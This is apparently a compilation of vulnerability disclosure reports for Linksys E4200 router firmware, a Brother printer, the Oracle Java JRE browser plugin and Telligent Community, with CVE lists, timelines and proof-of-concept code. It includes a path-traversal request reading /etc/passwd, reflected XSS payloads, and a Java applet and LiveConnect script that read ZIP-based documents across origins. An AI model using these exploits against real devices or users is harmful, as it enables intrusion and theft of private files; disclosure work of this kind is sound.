XSS, LFI, Linksys E4200 Firmware, 0D

XSS, LFI in Cisco, Linksys E4200 Firmware

CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684

Keywords

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp   

Credits

http://xss.cx/

Summary

Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview

Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Former Linksys products are now branded as Linksys by Cisco.

Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products.

Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.

Vendor Software

# Copyright (C) 2009, CyberTAN Corporation

# All Rights Reserved.

#

# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY

# KIND, EXPRESS OR IMPLIED, BY STATUTE.....

The Exploits

LFI PoC

POST /storage/apply.cgi HTTP/1.1

HOST: my.vunerable.e4500.firmware

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

LFI Results

XSS PoC

   /apply.cgi [log_type parameter]

   /apply.cgi [ping_ip parameter]

   /apply.cgi [ping_size parameter]

   /apply.cgi [submit_type parameter]

   /apply.cgi [traceroute_ip parameter]

   /storage/apply.cgi [new_workgroup parameter]

   /storage/apply.cgi [submit_button parameter]

POST /apply.cgi HTTP/1.1

…..

change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482

XSS Results

Other XSS PoC’s

&ping_ip=a.b.c.ddb0'><script>alert(1)</script>9479e857331

&ping_size=32dd369'><script>alert(1)</script>71a6e17036a

&submit_type=start_traceroute10808'%3balert(1)//922

&traceroute_ip=a.b.c.df0db4"><script>alert(1)</script>0f8d07c59be

CVE Information

File path traversal CVE-2013-2678

Cross-site scripting (reflected) CVE-2013-2679

Cleartext submission of password CVE-2013-2680

Password field with autocomplete enabled CVE-2013-2681

Frameable response (Clickjacking) CVE-2013-2682

Private IP addresses disclosed CVE-2013-2683

HTML does not specify charset CVE-2013-2684

CVSS Version 2 Score = 4.5

Version Information

XSS, Javascript Injection, Brother MFC-9970CDW Printer Firmware L, 0D

Brother MFC-9970CDW Printer Firmware 

CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676                        

Keywords
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW    

Summary
A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered during a PenTest in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview
Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies.

High-Performance Color Laser All-in-One for your Small Business or Workgroup

The MFC-9970cdw Color Laser All-in-One combines print, copy, scan and fax in one powerful device. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs – making this all-in-one a smart choice for a business or workgroup.

A Bug
Reflected Cross Site Scripting, CWE-79 - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Vulnerable Parameters = id , val, kind + Query String
Signature = "><script>alert(1)</script>

Proof of Concept (PoC) - XSS in Firmware L
Target:         Brother MFC-9970 CDW

GET PoC
/admin/admin_main.html?id=signedpdf"><script>alert(1)</script>&ScanCertificate=2 HTTP/1.1
Host: a.b.c.d

PoC URL
http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script>alert(1)</script>

Rendering

Screen Grab - XSS - Brother MFC-9970CDW


CVE Information
CVE-2013-2507 is specific to Firmware G.
XSS at:
  admin/log_to_net.html  id parameter
  fax/copy_settings.html kind parameter

CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L.
XSS at:
  admin/admin_main.html  name of an arbitrarily assigned URL parameter

CVE-2013-2671 is for the XSS issues that are only present in Firmware L.

CVEs for Firmware L:
Cleartext submission of password CVE-2013-2672
Password field with autocomplete enabled CVE-2013-2673
Cross-domain Referer leakage CVE-2013-2674
Frameable response (Clickjacking) CVE-2013-2675
Private IP addresses disclosed CVE-2013-2676
CVSS 2 Score = 4.5

Timeline
Attempt contact via e-mail in January 2013.
Call the Toll Free Support Line in March 2013.
Callback from Vendor in April 2013.
E-mail sent to Vendor in April 2013.
VENDOR UNRESPONSIVE
Published May 3, 2013

External Links
Brother USA http://www.brother-usa.com
Model MFC-9970CDW

0D Report
http://xss.cx/

CVE-2013-0438, Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes, XSS, Cross Site Scripting

Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes

CVE-2013-0438, Oracle Document

XSS.CX Allowance: $4,000 (Four Thousand US Dollars)

Keywords
Security, Web, Cross-Site Scripting, Private Bug Report, Oracle, Java, JRE, Same-Origin Policy

Summary
A bug in the Oracle Java  JRE 7u5 browser plugin allows cross-domain theft of any information encapsulated in a JAR or ZIP file. With the Java browser plugin being used by ~75% of all Internet users[1] this issue affects an overall of 1.7B users worldwide[2]. An attacker can access MS Word Documents, Excel Sheets, Visio data and other ZIP-based files across domains. No user interaction is required to carry out the attack. This document will introduce and discuss the vulnerability and provide several Proof-of-Concept (PoC) installations and code examples.
Introduction

Description
The Same Origin Policy installed in modern browsers is based on several components of the origins of two websites attempting communication with each other. Among those are the protocol those websites are using (HTTP, HTTPS or others), the subdomain, domain, top-level domain and in most user agents the port. In case two websites wish to initiate communication, they must share origin - or utilize browser-features such as domain relaxation or Cross-Origin Resource Sharing (CORS). The usual use case for the SOP on the vast majority of websites is delimiting cross origin communication capabilities for the sake of security and privacy.

The Java Runtime Engine nevertheless provides an own interpretation of the SOP and mostly relies on the IP address of two HTTP resources to determine, whether they might communicate across origins or not. Using cross origin communication for within a Java Applet or LiveConnect code with Java 6 and earlier versions required the browser to load the website via the IPv4 address it can be requested with. A resource residing on 1.2.3.4 could only request information from other resources residing on 1.2.3.4. Any other communication attempts from unsigned applets and LiveConnect code yielded security exceptions to be thrown.

This bug allows to bypass the policy for file types that are ZIP based. Using the handler for the jar: pseudo-protocol, all files within the browsers reach - including the intranet - are accessible. Due to the fact that we abuse a logical bug in the API’s control mechanisms, we comfortably have access to Java exposed interfaces that allow us to list files in an archive and read arbitrary information. The attack is limited to files reachable via HTTP or HTTPS. Since the attack uses Java’s environment to access these files, there are a few side-effects: Java has its own HTTP interfaces and does not include the user’s cookies when used as an applet. Also, it has its own certificate store, so self-signed SSL certificates that have been white-listed in the browser’s certificate store are only white-listed for Java if any other applet or Java application has done so. Valid SSL certificates are no drawback in this scenario.

This attack much easier to carry out in Firefox: Current Firefox versions come with a feature called LiveConnect that allows JavaScript code to use Java APIs without compilation or the use of bytecode Java files as applets. Simple script tags suffice (e.g. <script>x = new java.net.URL(); …</script>).
In this scenario, we are bound to the browser’s certificate and cookie store. All outgoing requests can bypass the Same Origin Policy and access foreign files but include the known sessions, saved passwords and accept formerly white-listed self-signed certificates.

PoC Examples
Example 1: Java Applet
This example works in all current browsers that come with Java support. The applet can read arbitrary ZIP files and their content. The target in line 14 has to be changed accordingly.

import java.awt.*;
import java.applet.Applet;
import java.io.*;
import java.net.*;

public class test2 extends Applet {

   private TextArea ltArea = new TextArea("", 100, 300);

   public void init() {
    add(ltArea);
}
   public void paint (Graphics g)  {
    String url_b = "jar:http://victim.com/confidential.odt!/content.xml";
    String content = "";
    try {
            URL u = new URL(url_b);
            BufferedReader ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream() ) );          
            while (ff.ready()) { content += ff.readLine();  }
    }
    catch (Exception e) { g.drawString( "Error",100,100); }
            ltArea.setText(content);
  }
}

Example 2: Proof of Concept for Firefox, listing ZIP file index and content of specific file
<pre id='res'>
</pre>
<script>
resultdiv = document.querySelector("#res");
url_a = "jar:https://victim.com/confidential.odt!/";
url_b = "jar:https://victim.com/confidential.odt!/content.xml";
//url_a = "jar:http://victim.com/confidential.docx!";
//url_b = "jar:http://victim.com/confidential.docx!/word/document.xml";

try {
        // Example 1: List all files in JAR-Archive
        resultdiv.textContent += 'Reading JAR and listing files...\n'

        u = new java.net.URL(url_a);
        x = u.openConnection();
        jarfile = x.getJarFile();
        iter = jarfile.entries();
        filelist = [];
        while (iter.hasMoreElements()) {
            i = iter.nextElement();
            filelist.push(i.getName() + " ("+ i.getSize()+ "Bytes)" );
        }
            resultdiv.textContent += "Files in JAR: \n\t" + filelist.join(',\n\t') + '\n\n';
 
 
        // Example 2: Read file content in JAR-Archive
 
        resultdiv.textContent += 'Reading file content in JAR...\n'  


        u = new java.net.URL(url_b);
        ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream() ) )
        content = "";
        while (ff.ready()) { content += ff.readLine();  }
        resultdiv.textContent += "Content of "+ url_b + ": \"" + content +'"\n';
 
}
catch(e) {
        resultdiv.textContent += e;
        resultdiv.textContent += '\nThis example has been tested with Firefox and Java 7 Update 5'
}
</script>
Listing 2: example2_firefox_only.html


Bug Metrics
Calculated CVSSv2 Score = 4.5

Impact: High - The exploit allows reading arbitrary filetypes that are based on the ZIP format. This includes documents for Microsoft Office, OpenOffice, AutoCAD and many more. Reading can occur from any HTTP or HTTPS resource accessible to the browser, including its Intranet

Exploitability: High - Stemming from a logical bug in the Java API, exploitability has a very high probability of success. The only requirement is, of course, that the Java browser plugin is installed and working.

________________
[1] StatOWL Java plugin usage in 2012 http://www.statowl.com/java.php
[2] World Internet Usage Stats 2012 http://www.internetworldstats.com/stats.htm

CVE-2012-1903, Stored XSS, Javascript Injection, Telligent Community 5.6.583.20496

Telligent Community 5.6.583.20496 (Build: 5.6.583.20496)
CVE-2012-1903
Persistent Flash XSS

Keywords: Security, Web, Cross-Site Scripting, Private Bug Report, Dell, Community, Adobe Flash, Telligent, EoL, No Fix


The affected platform is based on the third-party community software Telligent Community 5.6.583.20496 (Build: 5.6.583.20496). The current release is Community 7.x and was not tested, Version 5 is EoL.

Introduction
Telligent Community is social community software designed for flexibility in building customer-facing communities that achieve your business objectives for improving customer support, building brand loyalty and strengthening member networks. With Telligent Community, you can elevate customer experience with a branded community that perfectly reflects your brand and spur engagement with a complete set of social applications that add social context and relevancy to customer communication. Telligent Community features essential integration with popular social networks including Facebook and Twitter as well as web parts that add social capabilities such as blogging, friending and following to Microsoft SharePoint Internet sites.

Exploit

Our researchers discovered a persistent Flash XSS vulnerability caused by two minor security flaws enabling the exploit to work properly and cause heavy impact.

1. A logged in attacker can abuse a Community website to upload a maliciously prepared Flash file. This file is available for public browsing after successful upload.
2. The Flash file is being embedded by an Object element. This element is supplied with a special parameter capable of delimiting the possibly dangerous scripting capabilities of the Flash file. While this parameter called allowScriptAccess should be set to the value never, it is actually set to SameDomain. This enables the uploaded file to fully utilize scripting capabilities and cause XSS hazard.

The affected platform is based on the third-party community software Telligent Community 5.6.583.20496 (Build: 5.6.583.20496).

A Proof Of Concept (PoC) link was demonstrated to a Target and PoC provided in March 2012.

REWARD: 1250 EURO to ANONYMOUS

Bug Metrics:

Impact: High - complete control over a Community website and other Dell domains; Possibility to deploy Flash Malware and Virus Code

Exploitability: Critical - Any user visiting the maliciously prepared website can be affected. The potential victims do not have to be logged in. The attacker requires the victim to have a current version of the Flash Player installed.

Overall Score: Critical - Escalation of Privileges, Persistent Data Modification, Information Disclosure, Malware Distribution

Timeline:

April 9, 2012 - Received confirm of Receipt from Telegent
October 23, 2012 -  Response from Vendor with Ticket ref:_00D408i2C._50040NKYr7:ref
March 25, 2013 - No response from Vendor, Published

Note - Version 5 is EoL